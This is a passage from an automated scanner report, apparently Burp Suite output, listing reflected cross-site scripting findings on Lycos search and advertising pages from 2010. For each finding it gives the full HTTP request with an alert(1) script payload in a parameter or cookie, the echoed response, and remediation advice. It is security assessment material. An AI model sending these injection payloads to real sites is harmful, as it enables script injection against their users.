Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:03 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_multiaaf1c"><script>alert(1)</script>be82f60f06e&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.137. http://search.lycos.com/video/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50828"%3balert(1)//3e5bc5531b2 was submitted in the cat parameter. This input was echoed as 50828";alert(1)//3e5bc5531b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/?tab=multi&cat=video50828"%3balert(1)//3e5bc5531b2 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:07 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<!--
var cm_host = "multimedia.lycos.com";
var cm_taxid = "/results_video50828";alert(1)//3e5bc5531b2";
//-->
...[SNIP]...

1.138. http://search.lycos.com/video/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7de7a"><script>alert(1)</script>0aa4e76c954 was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/?tab=multi&cat=video7de7a"><script>alert(1)</script>0aa4e76c954 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:07 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_video7de7a"><script>alert(1)</script>0aa4e76c954&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.139. http://search.lycos.com/video/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2baf1"><script>alert(1)</script>9c23e31d9b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/?2baf1"><script>alert(1)</script>9c23e31d9b9=1 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:13 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?2baf1"><script>alert(1)</script>9c23e31d9b9=1&mobile=1">
...[SNIP]...

1.140. http://search.lycos.com/video/ [tab parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae732"><script>alert(1)</script>fc2ad86c0a was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/?tab=multiae732"><script>alert(1)</script>fc2ad86c0a&cat=video HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:05 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_multiae732"><script>alert(1)</script>fc2ad86c0a&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.141. http://advertising.lycos.com/ [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f38a"%3balert(1)//20a4f660a78 was submitted in the diktfc cookie. This input was echoed as 2f38a";alert(1)//20a4f660a78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: advertising.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f38a"%3balert(1)//20a4f660a78; PENTA=174.121.222.18.1292163892141045

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:26:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:26:50 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"advertising.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f38a";alert(1)//20a4f660a78.lycos.com"
});
</script>
...[SNIP]...

1.142. http://advertising.lycos.com/ [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7045"><script>alert(1)</script>e23721f874e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: advertising.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad7045"><script>alert(1)</script>e23721f874e; PENTA=174.121.222.18.1292163892141045

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:26:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:26:49 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=advertising.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad7045"><script>alert(1)</script>e23721f874e.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.143. http://advertising.lycos.com/bootstrap.js [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8531"%3balert(1)//6adf9a53388 was submitted in the diktfc cookie. This input was echoed as d8531";alert(1)//6adf9a53388 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bootstrap.js HTTP/1.1
Host: advertising.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad8531"%3balert(1)//6adf9a53388; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:14 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"advertising.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad8531";alert(1)//6adf9a53388.lycos.com"
});
</script>
...[SNIP]...

1.144. http://advertising.lycos.com/bootstrap.js [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ebb"><script>alert(1)</script>473ae392abf was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bootstrap.js HTTP/1.1
Host: advertising.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A86ebb"><script>alert(1)</script>473ae392abf; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:13 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=advertising.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A86ebb"><script>alert(1)</script>473ae392abf.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.145. http://advertising.lycos.com/contactus.html [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /contactus.html

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f719d"><script>alert(1)</script>1c833ec0851 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /contactus.html HTTP/1.1
Host: advertising.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af719d"><script>alert(1)</script>1c833ec0851; PENTA=174.121.222.18.1292163890688109

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:26:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:26:55 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=advertising.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af719d"><script>alert(1)</script>1c833ec0851.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.146. http://advertising.lycos.com/contactus.html [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /contactus.html

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73b5d"%3balert(1)//fbdd08a21ac was submitted in the diktfc cookie. This input was echoed as 73b5d";alert(1)//fbdd08a21ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contactus.html HTTP/1.1
Host: advertising.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A73b5d"%3balert(1)//fbdd08a21ac; PENTA=174.121.222.18.1292163890688109

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:26:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:26:56 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"advertising.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A73b5d";alert(1)//fbdd08a21ac.lycos.com"
});
</script>
...[SNIP]...

1.147. http://advertising.lycos.com/lycos.xml [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /lycos.xml

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad8cc"%3balert(1)//75d1be7661c was submitted in the diktfc cookie. This input was echoed as ad8cc";alert(1)//75d1be7661c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lycos.xml HTTP/1.1
Host: advertising.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aad8cc"%3balert(1)//75d1be7661c; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"advertising.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aad8cc";alert(1)//75d1be7661c.lycos.com"
});
</script>
...[SNIP]...

1.148. http://advertising.lycos.com/lycos.xml [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /lycos.xml

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 532cd"><script>alert(1)</script>325056d76aa was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /lycos.xml HTTP/1.1
